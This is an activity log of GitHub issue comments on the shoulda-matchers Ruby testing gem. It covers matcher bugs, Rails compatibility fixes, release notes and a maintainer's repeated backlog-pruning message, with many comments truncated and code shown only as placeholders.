[2020-04-27 20:27] allisonphillips commented on #625
@nimeshnikum I'm confused... is that supposed to be in response to me? I did not pluralize 'belongs' in my matcher example code, nor did the other commenters. The references to `has_and_belongs_to_many` in this thread are sample code for the association definitions in the class (which is the correctly named Rails method [#has_and_belongs_to_many](https://api.rubyonrails.org/v5.2.4/classes/ActiveRe

[2020-04-27 20:33] mcmire commented on #625
Hi @allisonphillips, I don't think there is an issue around the problem you're seeing (using a symbol with `join_table` not working). Would you mind creating a new issue so that we can track it better?

[2020-04-28 01:03] shevaun commented on #1288
@mcmire Cool thanks, and yep that would fix it - we've written a very similar monkey patch to get it working in our Rails app.
I'm happy to create a PR with this change if you like? Just let me know.

[2020-04-28 03:46] biinari commented on #1287
Further info on pipes in linux: https://linux.die.net/man/7/pipe section on Pipe Capacity. Current linux is 65536 bytes.

I am not sure how I was hitting this problem earlier but I have a PR ready to fix it anyway as reading from pipes as soon as data is available is recommended. Previously I was able to consistently reproduce the problem with over 4096 bytes. Now I can only reproduce with over 65

[2020-04-28 16:23] mcmire commented on #1288
@shevaun Yes that would be great!

[2020-04-29 03:53] shevaun commented on #1288
@mcmire I started doing this today, but as I was looking at `ActiveModel::Attributes` in Rails 6 I realised that it implements the `attribute_types` method, so it will never reach the problematic `model.respond_to?(:type_for_attribute)` code.

So I figured a better solution might be for the ActiveModelAttributes gem to implement `attribute_types`, thus bringing its interface closer to ActiveModel:

[2020-04-29 05:28] shevaun commented on #1288
https://github.com/Azdaroth/active_model_attributes/pull/15 has been merged and a new version of the gem released, so I don't think we need to do anything further with shoulda-matchers. Thanks for your quick responses 🙏

[2020-04-29 05:28] #1288 closed

[2020-04-29 14:55] mcmire commented on #1288
@shevaun Oh awesome! Thanks for following up!

[2020-05-05 06:33] mcmire commented on #1262
Closing since this is in master now.

[2020-05-05 06:33] #1262 closed

[2020-05-06 07:33] mcmire commented on #575
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:33] #575 closed

[2020-05-06 07:33] mcmire commented on #628
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:33] #628 closed

[2020-05-06 07:34] mcmire commented on #775
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #775 closed

[2020-05-06 07:34] mcmire commented on #774
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #774 closed

[2020-05-06 07:34] mcmire commented on #788
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #788 closed

[2020-05-06 07:34] mcmire commented on #805
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #805 closed

[2020-05-06 07:34] mcmire commented on #769
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #769 closed

[2020-05-06 07:34] mcmire commented on #796
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #796 closed

[2020-05-06 07:34] mcmire commented on #968
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #968 closed

[2020-05-06 07:34] mcmire commented on #882
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #882 closed

[2020-05-06 07:34] mcmire commented on #977
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #977 closed

[2020-05-06 07:34] mcmire commented on #865
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #865 closed

[2020-05-06 07:34] mcmire commented on #810
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #810 closed

[2020-05-06 07:34] mcmire commented on #994
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #994 closed

[2020-05-06 07:34] mcmire commented on #972
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #972 closed

[2020-05-06 07:34] mcmire commented on #990
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #990 closed

[2020-05-06 07:34] mcmire commented on #991
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:34] #991 closed

[2020-05-06 07:35] mcmire commented on #967
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #967 closed

[2020-05-06 07:35] mcmire commented on #1050
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #1050 closed

[2020-05-06 07:35] mcmire commented on #1000
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #1000 closed

[2020-05-06 07:35] mcmire commented on #1085
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #1085 closed

[2020-05-06 07:35] mcmire commented on #1071
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #1071 closed

[2020-05-06 07:35] mcmire commented on #640
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #640 closed

[2020-05-06 07:35] mcmire commented on #1157
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #1157 closed

[2020-05-06 07:35] mcmire commented on #643
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #643 closed

[2020-05-06 07:35] mcmire commented on #688
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #688 closed

[2020-05-06 07:35] mcmire commented on #706
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #706 closed

[2020-05-06 07:35] mcmire commented on #761
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #761 closed

[2020-05-06 07:35] mcmire commented on #766
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #766 closed

[2020-05-06 07:35] mcmire commented on #808
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #808 closed

[2020-05-06 07:35] mcmire commented on #778
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #778 closed

[2020-05-06 07:35] mcmire commented on #857
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #857 closed

[2020-05-06 07:35] mcmire commented on #858
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:35] #858 closed

[2020-05-06 07:35] mcmire commented on #907
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #907 closed

[2020-05-06 07:36] mcmire commented on #922
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #922 closed

[2020-05-06 07:36] mcmire commented on #952
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] mcmire commented on #962
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #962 closed

[2020-05-06 07:36] mcmire commented on #970
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #970 closed

[2020-05-06 07:36] mcmire commented on #973
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #973 closed

[2020-05-06 07:36] mcmire commented on #974
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #974 closed

[2020-05-06 07:36] mcmire commented on #985
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #985 closed

[2020-05-06 07:36] mcmire commented on #987
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #987 closed

[2020-05-06 07:36] mcmire commented on #988
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #988 closed

[2020-05-06 07:36] mcmire commented on #998
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #998 closed

[2020-05-06 07:36] mcmire commented on #1007
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] mcmire commented on #1010
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1010 closed

[2020-05-06 07:36] mcmire commented on #1011
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1011 closed

[2020-05-06 07:36] mcmire commented on #1022
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1022 closed

[2020-05-06 07:36] mcmire commented on #1044
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1044 closed

[2020-05-06 07:36] mcmire commented on #1052
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1052 closed

[2020-05-06 07:36] mcmire commented on #1053
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1053 closed

[2020-05-06 07:36] mcmire commented on #1067
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1067 closed

[2020-05-06 07:36] mcmire commented on #1083
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1083 closed

[2020-05-06 07:36] mcmire commented on #1094
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1094 closed

[2020-05-06 07:36] mcmire commented on #1113
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] mcmire commented on #1155
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1155 closed

[2020-05-06 07:36] mcmire commented on #1156
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1156 closed

[2020-05-06 07:36] mcmire commented on #1158
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1158 closed

[2020-05-06 07:36] mcmire commented on #1102
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1102 closed

[2020-05-06 07:36] mcmire commented on #1041
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1041 closed

[2020-05-06 07:36] mcmire commented on #1114
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] mcmire commented on #1005
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:36] #1005 closed

[2020-05-06 07:37] mcmire commented on #574
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:37] #574 closed

[2020-05-06 07:37] mcmire commented on #1199
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:37] #1199 closed

[2020-05-06 07:39] mcmire commented on #535
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:39] #535 closed

[2020-05-06 07:41] mcmire commented on #682
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:41] mcmire commented on #809
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:41] #809 closed

[2020-05-06 07:42] mcmire commented on #919
Hey folks. In an effort to lighten our load as maintainers and be able to serve you better in the future, the shoulda-matchers team is working on cleaning out the cobwebs in this repo by pruning the backlog. As there are few of us, there are a lot of items that will simply never earn our attention in a reasonable time frame, and rather than giving you an empty promise, we think it makes more sense

[2020-05-06 07:43] mcmire commented on #939
Closing this — if this comes up again, we can open another issue.

[2020-05-06 07:43] #939 closed

[2020-05-06 07:44] mcmire commented on #966
Closing this, since there hasn't been much activity in a while. If this is still a problem let me know and I'll reopen.

[2020-05-06 07:44] #966 closed

[2020-05-06 07:44] mcmire commented on #981
This is a good idea, but it's much lower priority than the current issues. I'm going to close this in the meantime.

[2020-05-06 07:44] #981 closed

[2020-05-13 05:07] #1287 closed

[2020-05-13 14:02] 4ndv commented on #919
Just happened to me and I've wasted half an hour to debug why does it happen. Maybe reopen?

[2020-05-13 15:28] mcmire commented on #919
Okay. It looks like #1238 will fix this issue so I'll reopen this in the meantime.

[2020-05-15 18:37] mcmire opened #1302 "should_not validate_presence_of can give a false positive"
If you have a situation where you have a presence validation with a custom message and you say `it { should_not validate_presence_of(:attribute) }` when in fact the validation is being run, the test will pass. This is technically true, because `it { should_not validate_presence_of(:attribute) }` is the same thing as saying `it { should_not validate_presence_of(:attribute).with_message(:blank) }`.

[2020-05-19 18:57] antifun commented on #919
I haven't touched this since August, but I can bring it up to date -- it's
a pretty low-impact change in terms of intended functionality, just
altering an uninformative message. How can I help get it merged?

-m

On Wed, May 13, 2020 at 10:29 AM Elliot Winkler <notifications@github.com>
wrote:

--
Matt Mitchell
Engineering Lead
Root Insurance

[2020-05-20 05:53] mcmire commented on #919
@antifun I just responded to your PR (finally)!

[2020-05-20 05:54] mcmire commented on #1280
Going to close this but let me know if you have any more questions!

[2020-05-20 05:54] #1280 closed

[2020-05-28 02:19] BrianHawley opened #1305 "The permit matcher isn't compatible with rails-forward_compatible_controller_tests"
When you are using the rails-forward_compatible_controller_tests gem to convert your tests to Rails 5 syntax, to prepare to upgrade from Rails < 5, Rails 5 syntax is supported and encouraged for controller tests. There is a `Rails::ForwardCompatibleControllerTests.raise_exception` setting to catch uses of old style syntax in your tests. This setting catches the controller action code generated by

[2020-05-28 17:10] kofiasare commented on #1153
Many thanks @pareeohnos and @mcmire. You helped me.

[2020-06-02 04:57] shivabhusal commented on #474
if you are migrating from Rails 3 to Rails 4 and getting this error follow this:-

[code]
Make sure to require this file in `spec_helper`

[2020-06-04 19:54] ptarud opened #1306 "/.rvm/gems/ruby-2.6.5/gems/shoulda-matchers-2.8.0/lib/shoulda/matchers/active_model/validate_inclusion_of_matcher.rb:251: warning: BigDecimal.new is deprecated; use BigDecimal() method instead"
shoulda-matchers version 2.8.0 use BigDecimal.new and in ruby 2.7 BigDecimal does not have new class method. Should be use BigDecimal() instead.

There is a way to use the last version in MiniTest ?

[2020-06-04 23:37] mcmire commented on #1306
Yes there is! I have a prerelease version for shoulda / shoulda-matchers that removes this warning. Try upgrading `shoulda` to 4.0.0.rc2, then add the following to the bottom of your `test_helper`:

[code]

[2020-06-05 16:47] ptarud commented on #1306
It works !! Thank you !

[2020-06-05 16:47] #1306 closed

[2020-06-10 22:54] alauper opened #1307 "Belongs To Relationship Set To Nil"
Hello,
I have a test that is failing because the belongs_to relationship is getting set to nil.  It's kind of hard for me to follow all the code, so here's what I see.

My model
app/models/location.rb
[code]

Test Case
spec/models/location_spec.rb
[code]

I see the following shoulda code

Why is it passing `nil`?
[code]

Value is `nil`
[code]
Values is `[nil]`
[code]
[code]
This will set `merchant

[2020-06-11 06:32] mcmire commented on #1307
This test is failing because in recent versions of Rails, `belongs_to` includes a presence validation to ensure that your association cannot be blank. Therefore, the `belong_to` matcher tests that this validation is in place by attempting to set it to nil. The fact that you are getting an error is revealing an unhandled case in your model, which you can recreate by saying:

[code]

Judging by the

[2020-06-11 15:20] alauper commented on #1307
oh yes, it definitely helps!  I appreciate you taking the time to explain that.  🙏

[2020-06-11 15:20] #1307 closed

[2020-06-13 01:07] bmuhamood commented on #930
Hi, Instead of using "**belong_to**", Just use "**belongs_to**" i was forgetting to add **'s'** and was getting this error.

[2020-06-13 17:37] mcmire commented on #930
@bmuhamood Sorry but I'm not sure how that would work. `belongs_to` is the name of the macro, but `belong_to` is the name of the matcher. Which version of shoulda-matchers are you using?

[2020-06-14 06:35] mcmire commented on #1249
Hey there, I'm going to close this issue if you don't mind. First, I'm trying to get to inbox zero and would prefer not to keep feature requests around without reasonably tested solutions. Second, this kind of thing hasn't come up very often, so I wonder how often it would get used. But third, I worry that your matcher may be too close to the Rails metal. For most of the matchers in the gem — at l

[2020-06-14 06:35] #1249 closed

[2020-06-14 06:47] mcmire commented on #1250
I (finally) released Shoulda 4.0.0 and shoulda-context 2.0.0 today, which means I could also update the Minitest instructions in the README to match the RSpec instructions. So this should be fixed now!

[2020-06-14 06:47] #1250 closed

[2020-06-14 06:49] mcmire commented on #1285
I'm going to close this given your comments, but let me know if you or your team develops a pattern around this that might be useful in matcher form.

[2020-06-14 06:49] #1285 closed

[2020-06-14 06:56] mcmire commented on #1305
Hi @BrianHawley, sorry for the delay in responding to this. I'm wondering if it might be more helpful to expose some kind of configuration variable instead of having the gem check explicitly for a constant. The reason I say this is that in order to test this, we'd have to add `rails-forward_compatible_controller_tests` as a development dependency and bake it into the integration tests, and I'd rat

[2020-06-14 07:00] mcmire commented on #1229
I (finally) released Shoulda 4.0.0 and shoulda-context 2.0.0, so all Shoulda gems should be up to date with one another and with modern Rails versions, and this problem should be solved. But let me know if you see any more issues.

[2020-06-14 07:00] #1229 closed

[2020-06-14 07:06] mcmire commented on #834
Unfortunately I haven't touched the work I was attempting to finish since when I left that comment and this feels like a lower priority thing in comparison to the other issues/PRs open right now so I'm just gonna call this one. Maybe somebody else will pick it up 😅

[2020-06-14 07:06] #834 closed

[2020-06-23 03:21] guialbuk opened #1311 "Remove webpakcer from CI"
